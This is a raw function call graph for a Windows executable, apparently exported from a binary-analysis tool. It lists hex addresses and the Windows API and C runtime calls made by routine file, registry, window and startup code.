97914->97906 97914->97907 97914->97910 97914->97911 97914->97915 97916 51017b 8 API calls 97914->97916 97916->97914 97917->97909 97918 4ff4c0 97921 50a025 97918->97921 97920 4ff4cc 97922 50a046 97921->97922 97928 50a0a3 97921->97928 97924 500340 207 API calls 97922->97924 97922->97928 97926 50a077 97924->97926 97925 54806b 97925->97925 97927 50a0e7 97926->97927 97926->97928 97929 4fbed9 8 API calls 97926->97929 97927->97920 97928->97927 97930 563fe1 81 API calls __wsopen_s 97928->97930 97929->97928 97930->97925 97931 500ebf 97932 500ed3 97931->97932 97938 501425 97931->97938 97933 51014b 8 API calls 97932->97933 97936 500ee5 97932->97936 97933->97936 97934 54562c 97964 561b14 8 API calls 97934->97964 97935 4fb4c8 8 API calls 97935->97936 97936->97934 97936->97935 97937 500f3e 97936->97937 97940 502b20 207 API calls 97937->97940 97953 50049d ISource 97937->97953 97938->97936 97941 4fbed9 8 API calls 97938->97941 97946 500376 ISource 97940->97946 97941->97936 97942 54632b 97968 563fe1 81 API calls __wsopen_s 97942->97968 97943 501695 97952 4fbed9 8 API calls 97943->97952 97943->97953 97944 501e50 40 API calls 97944->97946 97946->97942 97946->97943 97946->97944 97947 51014b 8 API calls 97946->97947 97948 545cdb 97946->97948 97949 54625a 97946->97949 97946->97953 97954 4fbed9 8 API calls 97946->97954 97955 501990 207 API calls 97946->97955 97957 4fbf73 8 API calls 97946->97957 97958 5105b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97946->97958 97959 546115 97946->97959 97960 500aae ISource 97946->97960 97961 510568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97946->97961 97963 510413 29 API calls pre_c_initialization 97946->97963 97947->97946 97948->97953 97956 4fbed9 8 API calls 97948->97956 97967 563fe1 81 API calls __wsopen_s 97949->97967 97952->97953 97954->97946 97955->97946 97956->97953 97957->97946 97958->97946 97965 563fe1 81 API calls __wsopen_s 97959->97965 97966 563fe1 81 API calls __wsopen_s 97960->97966 97961->97946 97963->97946 97964->97953 97965->97960 97966->97953 97967->97953 97968->97953 97969 528782 97974 52853e 97969->97974 97972 5287aa 97979 52856f try_get_first_available_module 97974->97979 97976 52876e 97993 522b5c 26 API calls _abort 97976->97993 97978 5286c3 97978->97972 97986 530d04 97978->97986 97979->97979 97982 5286b8 97979->97982 97989 51917b 40 API calls 2 library calls 97979->97989 97981 52870c 97981->97982 97990 51917b 40 API calls 2 library calls 97981->97990 97982->97978 97992 51f649 20 API calls _abort 97982->97992 97984 52872b 97984->97982 97991 51917b 40 API calls 2 library calls 97984->97991 97994 530401 97986->97994 97988 530d1f 97988->97972 97989->97981 97990->97984 97991->97982 97992->97976 97993->97978 97996 53040d ___BuildCatchObject 97994->97996 97995 53041b 98052 51f649 20 API calls _abort 97995->98052 97996->97995 97998 530454 97996->97998 98005 5309db 97998->98005 97999 530420 98053 522b5c 26 API calls _abort 97999->98053 98004 53042a __wsopen_s 98004->97988 98055 5307af 98005->98055 98008 530a26 98073 525594 98008->98073 98009 530a0d 98087 51f636 20 API calls _abort 98009->98087 98012 530a2b 98014 530a34 98012->98014 98015 530a4b 98012->98015 98013 530a12 98088 51f649 20 API calls _abort 98013->98088 98089 51f636 20 API calls _abort 98014->98089 98086 53071a CreateFileW 98015->98086 98019 530a39 98090 51f649 20 API calls _abort 98019->98090 98021 530b01 GetFileType 98022 530b0c GetLastError 98021->98022 98028 530b53 98021->98028 98093 51f613 20 API calls __dosmaperr 98022->98093 98023 530ad6 GetLastError 98092 51f613 20 API calls __dosmaperr 98023->98092 98026 530a84 98026->98021 98026->98023 98091 53071a CreateFileW 98026->98091 98027 530b1a CloseHandle 98027->98013 98030 530b43 98027->98030 98095 5254dd 21 API calls 2 library calls 98028->98095 98094 51f649 20 API calls _abort 98030->98094 98032 530ac9 98032->98021 98032->98023 98033 530b74 98035 530bc0 98033->98035 98096 53092b 72 API calls 3 library calls 98033->98096 98040 530bed 98035->98040 98097 5304cd 72 API calls 4 library calls 98035->98097 98036 530b48 98036->98013 98039 530be6 98039->98040 98041 530bfe 98039->98041 98098 528a2e 98040->98098 98043 530478 98041->98043 98044 530c7c CloseHandle 98041->98044 98054 5304a1 LeaveCriticalSection __wsopen_s 98043->98054 98113 53071a CreateFileW 98044->98113 98046 530ca7 98047 530cdd 98046->98047 98048 530cb1 GetLastError 98046->98048 98047->98043 98114 51f613 20 API calls __dosmaperr 98048->98114 98050 530cbd 98115 5256a6 21 API calls 2 library calls 98050->98115 98052->97999 98053->98004 98054->98004 98056 5307d0 98055->98056 98061 5307ea 98055->98061 98056->98061 98123 51f649 20 API calls _abort 98056->98123 98059 5307df 98124 522b5c 26 API calls _abort 98059->98124 98116 53073f 98061->98116 98062 530851 98071 5308a4 98062->98071 98127 51da7d 26 API calls 2 library calls 98062->98127 98063 530822 98063->98062 98125 51f649 20 API calls _abort 98063->98125 98066 530846 98126 522b5c 26 API calls _abort 98066->98126 98067 53089f 98068 53091e 98067->98068 98067->98071 98128 522b6c 11 API calls _abort 98068->98128 98071->98008 98071->98009 98072 53092a 98074 5255a0 ___BuildCatchObject 98073->98074 98131 5232d1 EnterCriticalSection 98074->98131 98076 5255a7 98077 5255cc 98076->98077 98082 52563a EnterCriticalSection 98076->98082 98085 5255ee 98076->98085 98135 525373 21 API calls 3 library calls 98077->98135 98079 525617 __wsopen_s 98079->98012 98081 5255d1 98081->98085 98136 5254ba EnterCriticalSection 98081->98136 98083 525647 LeaveCriticalSection 98082->98083 98082->98085 98083->98076 98132 52569d 98085->98132 98086->98026 98087->98013 98088->98043 98089->98019 98090->98013 98091->98032 98092->98013 98093->98027 98094->98036 98095->98033 98096->98035 98097->98039 98099 525737 __wsopen_s 26 API calls 98098->98099 98102 528a3e 98099->98102 98100 528a44 98138 5256a6 21 API calls 2 library calls 98100->98138 98102->98100 98103 528a76 98102->98103 98104 525737 __wsopen_s 26 API calls 98102->98104 98103->98100 98105 525737 __wsopen_s 26 API calls 98103->98105 98107 528a6d 98104->98107 98108 528a82 CloseHandle 98105->98108 98106 528a9c 98109 528abe 98106->98109 98139 51f613 20 API calls __dosmaperr 98106->98139 98110 525737 __wsopen_s 26 API calls 98107->98110 98108->98100 98111 528a8e GetLastError 98108->98111 98109->98043 98110->98103 98111->98100 98113->98046 98114->98050 98115->98047 98118 530757 98116->98118 98117 530772 98117->98063 98118->98117 98129 51f649 20 API calls _abort 98118->98129 98120 530796 98130 522b5c 26 API calls _abort 98120->98130 98122 5307a1 98122->98063 98123->98059 98124->98061 98125->98066 98126->98062 98127->98067 98128->98072 98129->98120 98130->98122 98131->98076 98137 523319 LeaveCriticalSection 98132->98137 98134 5256a4 98134->98079 98135->98081 98136->98085 98137->98134 98138->98106 98139->98109 98140 4fdd3d 98141 5419c2 98140->98141 98142 4fdd63 98140->98142 98145 541a82 98141->98145 98150 541a26 98141->98150 98153 541a46 98141->98153 98143 4fdead 98142->98143 98146 51014b 8 API calls 98142->98146 98147 51017b 8 API calls 98143->98147 98200 563fe1 81 API calls __wsopen_s 98145->98200 98151 4fdd8d 98146->98151 98158 4fdee4 __fread_nolock 98147->98158 98148 541a7d 98198 50e6e8 207 API calls 98150->98198 98154 51014b 8 API calls 98151->98154 98151->98158 98153->98148 98199 563fe1 81 API calls __wsopen_s 98153->98199 98155 4fdddb 98154->98155 98155->98150 98157 4fde16 98155->98157 98156 51017b 8 API calls 98156->98158 98159 500340 207 API calls 98157->98159 98158->98153 98158->98156 98160 4fde29 98159->98160 98160->98148 98160->98158 98161 541aa5 98160->98161 98162 4fde77 98160->98162 98164 4fd526 98160->98164 98201 563fe1 81 API calls __wsopen_s 98161->98201 98162->98143 98162->98164 98165 51014b 8 API calls 98164->98165 98166 4fd589 98165->98166 98182 4fc32d 98166->98182 98169 51014b 8 API calls 98174 4fd66e ISource 98169->98174 98171 4fb4c8 8 API calls 98171->98174 98173 541f79 98202 5556ae 8 API calls ISource 98173->98202 98174->98171 98174->98173 98176 541f94 98174->98176 98177 4fbed9 8 API calls 98174->98177 98178 4fc3ab 8 API calls 98174->98178 98179 4fd911 ISource 98174->98179 98177->98174 98178->98174 98180 4fd9ac ISource 98179->98180 98189 4fc3ab 98179->98189 98181 4fd9c3 98180->98181 98197 50e30a 8 API calls ISource 98180->98197 98185 4fc33d 98182->98185 98183 4fc345 98183->98169 98184 51014b 8 API calls 98184->98185 98185->98183 98185->98184 98186 4fbf73 8 API calls 98185->98186 98187 4fbed9 8 API calls 98185->98187 98188 4fc32d 8 API calls 98185->98188 98186->98185 98187->98185 98188->98185 98190 4fc3b9 98189->98190 98196 4fc3e1 ISource 98189->98196 98191 4fc3c7 98190->98191 98192 4fc3ab 8 API calls 98190->98192 98193 4fc3cd 98191->98193 98194 4fc3ab 8 API calls 98191->98194 98192->98191 98193->98196 98203 4fc7e0 8 API calls ISource 98193->98203 98194->98193 98196->98180 98197->98180 98198->98153 98199->98148 98200->98148 98201->98148 98202->98176 98203->98196 98204 4ff4dc 98205 4fcab0 207 API calls 98204->98205 98206 4ff4ea 98205->98206 98207 4f105b 98212 4f52a7 98207->98212 98209 4f106a 98243 510413 29 API calls __onexit 98209->98243 98211 4f1074 98213 4f52b7 __wsopen_s 98212->98213 98214 4fbf73 8 API calls 98213->98214 98215 4f536d 98214->98215 98244 4f5594 98215->98244 98217 4f5376 98251 4f5238 98217->98251 98220 4f6b7c 8 API calls 98221 4f538f 98220->98221 98257 4f6a7c 98221->98257 98224 4fbf73 8 API calls 98225 4f53a7 98224->98225 98226 4fbd57 8 API calls 98225->98226 98227 4f53b0 RegOpenKeyExW 98226->98227 98228 534be6 RegQueryValueExW 98227->98228 98233 4f53d2 98227->98233 98229 534c03 98228->98229 98230 534c7c RegCloseKey 98228->98230 98231 51017b 8 API calls 98229->98231 98230->98233 98242 534c8e _wcslen 98230->98242 98232 534c1c 98231->98232 98234 4f423c 8 API calls 98232->98234 98233->98209 98235 534c27 RegQueryValueExW 98234->98235 98237 534c44 98235->98237 98239 534c5e ISource 98235->98239 98236 4f655e 8 API calls 98236->98242 98238 4f8577 8 API calls 98237->98238 98238->98239 98239->98230 98240 4fb329 8 API calls 98240->98242 98241 4f6a7c 8 API calls 98241->98242 98242->98233 98242->98236 98242->98240 98242->98241 98243->98211 98245 5322d0 __wsopen_s 98244->98245 98246 4f55a1 GetModuleFileNameW 98245->98246 98247 4fb329 8 API calls 98246->98247 98248 4f55c7 98247->98248 98249 4f5851 9 API calls 98248->98249 98250 4f55d1 98249->98250 98250->98217 98252 5322d0 __wsopen_s 98251->98252 98253 4f5245 GetFullPathNameW 98252->98253 98254 4f5267 98253->98254 98255 4f8577 8 API calls 98254->98255 98256 4f5285 98255->98256 98256->98220 98258 4f6a8b 98257->98258 98262 4f6aac __fread_nolock 98257->98262 98260 51017b 8 API calls 98258->98260 98259 51014b 8 API calls 98261 4f539e 98259->98261 98260->98262 98261->98224 98262->98259 98263 4f1098 98268 4f5fc8 98263->98268 98267 4f10a7 98269 4fbf73 8 API calls 98268->98269 98270 4f5fdf GetVersionExW 98269->98270 98271 4f8577 8 API calls 98270->98271 98272 4f602c 98271->98272 98273 4fadf4 8 API calls 98272->98273 98275 4f6062 98272->98275 98274 4f6056 98273->98274 98277 4f55dc 8 API calls 98274->98277 98276 4f611c GetCurrentProcess IsWow64Process 98275->98276 98283 535224 98275->98283 98278 4f6138 98276->98278 98277->98275 98279 535269 GetSystemInfo 98278->98279 98280 4f6150 LoadLibraryA 98278->98280 98281 4f619d GetSystemInfo 98280->98281 98282 4f6161 GetProcAddress 98280->98282 98285 4f6177 98281->98285 98282->98281 98284 4f6171 GetNativeSystemInfo 98282->98284 98284->98285 98286 4f617b FreeLibrary 98285->98286 98287 4f109d 98285->98287 98286->98287 98288 510413 29 API calls __onexit 98287->98288 98288->98267 98289 4f36f5 98292 4f370f 98289->98292 98293 4f3726 98292->98293 98294 4f372b 98293->98294 98295 4f378a 98293->98295 98331 4f3788 98293->98331 98299 4f3738 98294->98299 98300 4f3804 PostQuitMessage 98294->98300 98297 533df4 98295->98297 98298 4f3790 98295->98298 98296 4f376f DefWindowProcW 98321 4f3709 98296->98321 98347 4f2f92 10 API calls 98297->98347 98304 4f37bc SetTimer RegisterWindowMessageW 98298->98304 98305 4f3797 98298->98305 98301 533e61 98299->98301 98302 4f3743 98299->98302 98300->98321 98350 55c8f7 65 API calls ___scrt_fastfail 98301->98350 98306 4f380e 98302->98306 98307 4f374d 98302->98307 98308 4f37e5 CreatePopupMenu 98304->98308 98304->98321 98311 533d95 98305->98311 98312 4f37a0 KillTimer 98305->98312 98337 50fcad 98306->98337 98313 4f3758 98307->98313 98325 533e46 98307->98325 98308->98321 98310 533e15 98348 50f23c 40 API calls 98310->98348 98317 533dd0 MoveWindow 98311->98317 98318 533d9a 98311->98318 98319 4f3907 Shell_NotifyIconW 98312->98319 98320 4f37f2 98313->98320 98327 4f3763 98313->98327 98314 533e73 98314->98296 98314->98321 98317->98321 98322 533da0 98318->98322 98323 533dbf SetFocus 98318->98323 98324 4f37b3 98319->98324 98345 4f381f 75 API calls ___scrt_fastfail 98320->98345 98322->98327 98328 533da9 98322->98328 98323->98321 98344 4f59ff DeleteObject DestroyWindow 98324->98344 98325->98296 98349 551423 8 API calls 98325->98349 98327->98296 98334 4f3907 Shell_NotifyIconW 98327->98334 98346 4f2f92 10 API calls 98328->98346 98331->98296 98332 4f3802 98332->98321 98335 533e3a 98334->98335 98336 4f396b 60 API calls 98335->98336 98336->98331 98338 50fcc5 ___scrt_fastfail 98337->98338 98339 50fd4b 98337->98339 98340 4f61a9 55 API calls 98338->98340 98339->98321 98342 50fcec 98340->98342 98341 50fd34 KillTimer SetTimer 98341->98339 98342->98341 98343 54fe2b Shell_NotifyIconW 98342->98343 98343->98341 98344->98321 98345->98332 98346->98321 98347->98310 98348->98327 98349->98331 98350->98314 98351 51076b 98352 510777 ___BuildCatchObject 98351->98352 98381 510221 98352->98381 98354 51077e 98355 5108d1 98354->98355 98358 5107a8 98354->98358 98419 510baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 98355->98419 98357 5108d8 98420 5151c2 28 API calls _abort 98357->98420 98370 5107e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 98358->98370 98392 5227ed 98358->98392 98360 5108de 98421 515174 28 API calls _abort 98360->98421 98364 5108e6 98365 5107c7 98367 510848 98400 510cc9 98367->98400 98369 51084e 98404 4f331b 98369->98404 98370->98367 98415 51518a 38 API calls 2 library calls 98370->98415 98375 51086a 98375->98357 98376 51086e 98375->98376 98377 510877 98376->98377 98417 515165 28 API calls _abort 98376->98417 98418 5103b0 13 API calls 2 library calls 98377->98418 98380 51087f 98380->98365 98382 51022a 98381->98382 98422 510a08 IsProcessorFeaturePresent 98382->98422 98384 510236 98423 513004 10 API calls 3 library calls 98384->98423 98386 51023b 98387 51023f 98386->98387 98424 522687 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 98386->98424 98387->98354 98389 510248 98390 510256 98389->98390 98425 51302d 8 API calls 3 library calls 98389->98425 98390->98354 98395 522804 98392->98395 98394 5107c1 98394->98365 98396 522791 98394->98396 98426 510dfc 98395->98426 98399 5227c0 98396->98399 98397 510dfc CatchGuardHandler 5 API calls 98398 5227e9 98397->98398 98398->98370 98399->98397 98434 5126b0 98400->98434 98402 510cdc GetStartupInfoW 98403 510cef 98402->98403 98403->98369 98405 4f3327 IsThemeActive 98404->98405 98406 4f3382 98404->98406 98436 5152b3 98405->98436 98416 510d02 GetModuleHandleW 98406->98416 98408 4f3352 98442 515319 98408->98442 98410 4f3359 98449 4f32e6 SystemParametersInfoW SystemParametersInfoW 98410->98449 98412 4f3360 98450 4f338b 98412->98450 98414 4f3368 SystemParametersInfoW 98414->98406 98415->98367 98416->98375 98417->98377 98418->98380 98419->98357 98420->98360 98421->98364 98422->98384 98423->98386 98424->98389 98425->98387 98427 510e05 98426->98427 98428 510e07 IsProcessorFeaturePresent 98426->98428 98427->98394 98430 510fce 98428->98430 98433 510f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 98430->98433 98432 5110b1 98432->98394 98433->98432 98435 5126c7 98434->98435 98435->98402 98435->98435 98437 5152bf ___BuildCatchObject 98436->98437 98499 5232d1 EnterCriticalSection 98437->98499 98439 5152ca pre_c_initialization 98500 51530a 98439->98500 98441 5152ff __wsopen_s 98441->98408 98443 515325 98442->98443 98444 51533f 98442->98444 98443->98444 98504 51f649 20 API calls _abort 98443->98504 98444->98410 98446 51532f 98505 522b5c 26 API calls _abort 98446->98505 98448 51533a 98448->98410 98449->98412 98451 4f339b __wsopen_s 98450->98451 98452 4fbf73 8 API calls 98451->98452 98453 4f33a7 GetCurrentDirectoryW 98452->98453 98506 4f4fd9 98453->98506 98455 4f33ce IsDebuggerPresent 98456 533ca3 MessageBoxA 98455->98456 98457 4f33dc 98455->98457 98458 533cbb 98456->98458 98457->98458 98459 4f33f0 98457->98459 98610 4f4176 8 API calls 98458->98610 98574 4f3a95 98459->98574 98467 4f3462 98468 533cec SetCurrentDirectoryW 98467->98468 98469 4f346a 98467->98469 98468->98469 98470 4f3475 98469->98470 98611 551fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 98469->98611 98606 4f34d3 7 API calls 98470->98606 98473 533d07 98473->98470 98476 533d19 98473->98476 98478 4f5594 10 API calls 98476->98478 98477 4f347f 98480 4f396b 60 API calls 98477->98480 98484 4f3494 98477->98484 98479 533d22 98478->98479 98481 4fb329 8 API calls 98479->98481 98480->98484 98482 533d30 98481->98482 98485 533d38 98482->98485 98486 533d5f 98482->98486 98483 4f34af 98488 4f34b6 SetCurrentDirectoryW 98483->98488 98484->98483 98487 4f3907 Shell_NotifyIconW 98484->98487 98490 4f6b7c 8 API calls 98485->98490 98489 4f6b7c 8 API calls 98486->98489 98487->98483 98491 4f34ca 98488->98491 98492 533d5b GetForegroundWindow ShellExecuteW 98489->98492 98493 533d43 98490->98493 98491->98414 98496 533d90 98492->98496 98495 4f7bb5 8 API calls 98493->98495 98497 533d51 98495->98497 98496->98483 98498 4f6b7c 8 API calls 98497->98498 98498->98492 98499->98439 98503 523319 LeaveCriticalSection 98500->98503 98502 515311 98502->98441 98503->98502 98504->98446 98505->98448 98507 4fbf73 8 API calls 98506->98507 98508 4f4fef 98507->98508 98612 4f63d7 98508->98612 98510 4f500d 98511 4fbd57 8 API calls 98510->98511 98512 4f5021 98511->98512 98513 4fbed9 8 API calls 98512->98513 98514 4f502c 98513->98514 98626 4f893c 98514->98626 98517 4fb329 8 API calls 98518 4f5045 98517->98518 98519 4fbe2d 39 API calls 98518->98519 98520 4f5055 98519->98520 98521 4fb329 8 API calls 98520->98521 98522 4f507b 98521->98522 98523 4fbe2d 39 API calls 98522->98523 98524 4f508a 98523->98524 98525 4fbf73 8 API calls 98524->98525 98526 4f50a8 98525->98526 98629 4f51ca 98526->98629 98529 514d98 _strftime 40 API calls 98530 4f50c2 98529->98530 98531 534b23 98530->98531 98532 4f50cc 98530->98532 98534 4f51ca 8 API calls 98531->98534 98533 514d98 _strftime 40 API calls 98532->98533 98535 4f50d7 98533->98535 98536 534b37 98534->98536 98535->98536 98537 4f50e1 98535->98537 98539 4f51ca 8 API calls 98536->98539 98538 514d98 _strftime 40 API calls 98537->98538 98541 4f50ec 98538->98541 98540 534b53 98539->98540 98543 4f5594 10 API calls 98540->98543 98541->98540 98542 4f50f6 98541->98542 98544 514d98 _strftime 40 API calls 98542->98544 98545 534b76 98543->98545 98546 4f5101 98544->98546 98547 4f51ca 8 API calls 98545->98547 98548 534b9f 98546->98548 98549 4f510b 98546->98549 98550 534b82 98547->98550 98552 4f51ca 8 API calls 98548->98552 98551 4f512e 98549->98551 98555 4fbed9 8 API calls 98549->98555 98554 4fbed9 8 API calls 98550->98554 98553 534bda 98551->98553 98557 4f7e12 8 API calls 98551->98557 98556 534bbd 98552->98556 98558 534b90 98554->98558 98559 4f5121 98555->98559 98560 4fbed9 8 API calls 98556->98560 98562 4f513e 98557->98562 98563 4f51ca 8 API calls 98558->98563 98564 4f51ca 8 API calls 98559->98564 98561 534bcb 98560->98561 98565 4f51ca 8 API calls 98561->98565 98566 4f8470 8 API calls 98562->98566 98563->98548 98564->98551 98565->98553 98567 4f514c 98566->98567 98635 4f8a60 98567->98635 98569 4f5167 98570 4f893c 8 API calls 98569->98570 98571 4f8a60 8 API calls 98569->98571 98572 4f51ab 98569->98572 98573 4f51ca 8 API calls 98569->98573 98570->98569 98571->98569 98572->98455 98573->98569 98575 4f3aa2 __wsopen_s 98574->98575 98576 4f3abb 98575->98576 98577 5340da ___scrt_fastfail 98575->98577 98578 4f5851 9 API calls 98576->98578 98579 5340f6 GetOpenFileNameW 98577->98579 98580 4f3ac4 98578->98580 98581 534145 98579->98581 98647 4f3a57 98580->98647 98583 4f8577 8 API calls 98581->98583 98585 53415a 98583->98585 98585->98585 98587 4f3ad9 98665 4f62d5 98587->98665 99208 4f3624 7 API calls 98606->99208 98608 4f347a 98609 4f35b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98608->98609 98609->98477 98610->98467 98611->98473 98613 4f63e4 __wsopen_s 98612->98613 98614 4f8577 8 API calls 98613->98614 98615 4f6416 98613->98615 98614->98615 98616 4f655e 8 API calls 98615->98616 98624 4f644c 98615->98624 98616->98615 98617 4fb329 8 API calls 98618 4f6543 98617->98618 98620 4f6a7c 8 API calls 98618->98620 98619 4fb329 8 API calls 98619->98624 98621 4f654f 98620->98621 98621->98510 98622 4f6a7c 8 API calls 98622->98624 98623 4f651a 98623->98617 98623->98621 98624->98619 98624->98622 98624->98623 98625 4f655e 8 API calls 98624->98625 98625->98624 98627 51014b 8 API calls 98626->98627 98628 4f5038 98627->98628 98628->98517 98630 4f51d4 98629->98630 98631 4f51f2 98629->98631 98633 4fbed9 8 API calls 98630->98633 98634 4f50b4 98630->98634 98632 4f8577 8 API calls 98631->98632 98632->98634 98633->98634 98634->98529 98636 4f8a76 98635->98636 98637 536737 98636->98637 98643 4f8a80 98636->98643 98646 50b7a2 8 API calls 98637->98646 98638 536744 98640 4fb4c8 8 API calls 98638->98640 98642 536762 98640->98642 98641 4f8b9b 98641->98569 98642->98642 98643->98638 98643->98641 98644 4f8b94 98643->98644 98645 51014b 8 API calls 98644->98645 98645->98641 98646->98638 98648 5322d0 __wsopen_s 98647->98648 98649 4f3a64 GetLongPathNameW 98648->98649 98650 4f8577 8 API calls 98649->98650 98651 4f3a8c 98650->98651 98652 4f53f2 98651->98652 98653 4fbf73 8 API calls 98652->98653 98654 4f5404 98653->98654 98655 4f5851 9 API calls 98654->98655 98656 4f540f 98655->98656 98657 4f541a 98656->98657 98661 534d5b 98656->98661 98658 4f6a7c 8 API calls 98657->98658 98660 4f5426 98658->98660 98695 4f1340 98660->98695 98662 534d7d 98661->98662 98701 50e36b 41 API calls 98661->98701 98664 4f5439 98664->98587 98702 4f6679 98665->98702 98668 535336 98827 5636b8 98668->98827 98669 4f6679 93 API calls 98671 4f630e 98669->98671 98671->98668 98673 4f6316 98671->98673 98677 535353 98673->98677 98678 4f6322 98673->98678 98872 55e30e 82 API calls 98677->98872 98724 4f3b39 98678->98724 98682 535361 98696 4f1352 98695->98696 98700 4f1371 __fread_nolock 98695->98700 98698 51017b 8 API calls 98696->98698 98697 51014b 8 API calls 98699 4f1388 98697->98699 98698->98700 98699->98664 98700->98697 98701->98661 98876 4f663e LoadLibraryA 98702->98876 98707 535648 98710 4f66e7 68 API calls 98707->98710 98708 4f66a4 LoadLibraryExW 98884 4f6607 LoadLibraryA 98708->98884 98712 53564f 98710->98712 98714 4f6607 3 API calls 98712->98714 98716 535657 98714->98716 98715 4f66ce 98715->98716 98717 4f66da 98715->98717 98905 4f684a 98716->98905 98719 4f66e7 68 API calls 98717->98719 98721 4f62fa 98719->98721 98721->98668 98721->98669 98725 53415f 98724->98725 98726 4f3b62 98724->98726 98828 5636d4 98827->98828 98829 4f6874 64 API calls 98828->98829 98830 5636e8 98829->98830 99106 563827 98830->99106 98872->98682 98877 4f6656 GetProcAddress 98876->98877 98878 4f6674 98876->98878 98879 4f6666 98877->98879 98881 51e95b 98878->98881 98879->98878 98880 4f666d FreeLibrary 98879->98880 98880->98878 98913 51e89a 98881->98913 98883 4f6698 98883->98707 98883->98708 98885 4f661c GetProcAddress 98884->98885 98886 4f663b 98884->98886 98887 4f662c 98885->98887 98889 4f6720 98886->98889 98887->98886 98888 4f6634 FreeLibrary 98887->98888 98888->98886 98890 51017b 8 API calls 98889->98890 98891 4f6735 98890->98891 98892 4f423c 8 API calls 98891->98892 98894 4f6741 __fread_nolock 98892->98894 98893 5356c2 98973 563a92 74 API calls 98893->98973 98894->98893 98899 4f677c 98894->98899 98972 563a0e CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 98894->98972 98897 4f684a 40 API calls 98897->98899 98898 4f6810 ISource 98898->98715 98899->98897 98899->98898 98900 535706 98899->98900 98902 4f6874 64 API calls 98899->98902 98967 4f6874 98900->98967 98902->98899 98906 535760 98905->98906 98907 4f685c 98905->98907 99005 51ec34 98907->99005 98910 5632bd 99042 56310d 98910->99042 98916 51e8a6 ___BuildCatchObject 98913->98916 98914 51e8b4 98938 51f649 20 API calls _abort 98914->98938 98916->98914 98918 51e8e4 98916->98918 98917 51e8b9 98939 522b5c 26 API calls _abort 98917->98939 98920 51e8f6 98918->98920 98921 51e8e9 98918->98921 98930 5283e1 98920->98930 98940 51f649 20 API calls _abort 98921->98940 98924 51e8c4 __wsopen_s 98924->98883 98925 51e8ff 98926 51e912 98925->98926 98927 51e905 98925->98927 98942 51e944 LeaveCriticalSection __fread_nolock 98926->98942 98941 51f649 20 API calls _abort 98927->98941 98931 5283ed ___BuildCatchObject 98930->98931 98943 5232d1 EnterCriticalSection 98931->98943 98933 5283fb 98944 52847b 98933->98944 98937 52842c __wsopen_s 98937->98925 98938->98917 98939->98924 98940->98924 98941->98924 98942->98924 98943->98933 98951 52849e 98944->98951 98945 528408 98958 528437 98945->98958 98946 5284f7 98963 524ff0 20 API calls 2 library calls 98946->98963 98948 528500 98950 522d38 _free 20 API calls 98948->98950 98952 528509 98950->98952 98951->98945 98951->98946 98961 5194fd EnterCriticalSection 98951->98961 98962 519511 LeaveCriticalSection 98951->98962 98952->98945 98964 523778 11 API calls 2 library calls 98952->98964 98955 528528 98965 5194fd EnterCriticalSection 98955->98965 98957 52853b 98957->98945 98966 523319 LeaveCriticalSection 98958->98966 98960 52843e 98960->98937 98961->98951 98962->98951 98963->98948 98964->98955 98965->98957 98966->98960 98968 535780 98967->98968 98969 4f6883 98967->98969 98974 51f053 98969->98974 98972->98893 98973->98899 98977 51ee1a 98974->98977 98978 51ee26 ___BuildCatchObject 98977->98978 98979 51ee32 98978->98979 98981 51ee58 98978->98981 99002 51f649 20 API calls _abort 98979->99002 98990 5194fd EnterCriticalSection 98981->98990 98982 51ee37 99003 522b5c 26 API calls _abort 98982->99003 98984 51ee64 98991 51ef7a 98984->98991 98989 51ee42 __wsopen_s 98990->98984 98992 51ef9c 98991->98992 98993 51ef8c 98991->98993 98994 51f649 __dosmaperr 20 API calls 98993->98994 99002->98982 99003->98989 99008 51ec51 99005->99008 99007 4f686d 99007->98910 99009 51ec5d ___BuildCatchObject 99008->99009 99010 51ec9d 99009->99010 99011 51ec95 __wsopen_s 99009->99011 99014 51ec70 ___scrt_fastfail 99009->99014 99021 5194fd EnterCriticalSection 99010->99021 99011->99007 99013 51eca7 99022 51ea68 99013->99022 99035 51f649 20 API calls _abort 99014->99035 99017 51ec8a 99036 522b5c 26 API calls _abort 99017->99036 99021->99013 99023 51ea7a ___scrt_fastfail 99022->99023 99028 51ea97 99022->99028 99024 51ea87 99023->99024 99023->99028 99033 51eada __fread_nolock 99023->99033 99038 51f649 20 API calls _abort 99024->99038 99026 51ea8c 99039 522b5c 26 API calls _abort 99026->99039 99037 51ecdc LeaveCriticalSection __fread_nolock 99028->99037 99029 51ebf6 ___scrt_fastfail 99041 51f649 20 API calls _abort 99029->99041 99031 51dcc5 __fread_nolock 26 API calls 99031->99033 99033->99028 99033->99029 99033->99031 99034 5290c5 __fread_nolock 38 API calls 99033->99034 99040 51d2e8 26 API calls 4 library calls 99033->99040 99034->99033 99035->99017 99036->99011 99037->99011 99038->99026 99039->99028 99040->99033 99041->99026 99045 51e858 99042->99045 99044 56311c 99048 51e7d9 99045->99048 99047 51e875 99047->99044 99049 51e7e8 99048->99049 99050 51e7fc 99048->99050 99056 51f649 20 API calls _abort 99049->99056 99055 51e7f8 __alldvrm 99050->99055 99058 5236b2 11 API calls 2 library calls 99050->99058 99052 51e7ed 99057 522b5c 26 API calls _abort 99052->99057 99055->99047 99056->99052 99057->99055 99058->99055 99208->98608 99209 5465af 99210 51014b 8 API calls 99209->99210 99211 5465b6 99210->99211 99215 55fafb 99211->99215 99213 5465c2 99214 55fafb 8 API calls 99213->99214 99214->99213 99216 55fb1b 99215->99216 99217 55fbe4 99216->99217 99218 51017b 8 API calls 99216->99218 99217->99213 99219 55fb57 99218->99219 99222 55fb79 99219->99222 99223 55fbed 8 API calls 99219->99223 99221 4fbed9 8 API calls 99221->99222 99222->99217 99222->99221 99223->99219 99224 4f1033 99229 4f68b4 99224->99229 99228 4f1042 99230 4fbf73 8 API calls 99229->99230 99231 4f6922 99230->99231 99237 4f589f 99231->99237 99234 4f69bf 99235 4f1038 99234->99235 99240 4f6b14 8 API calls __fread_nolock 99234->99240 99236 510413 29 API calls __onexit 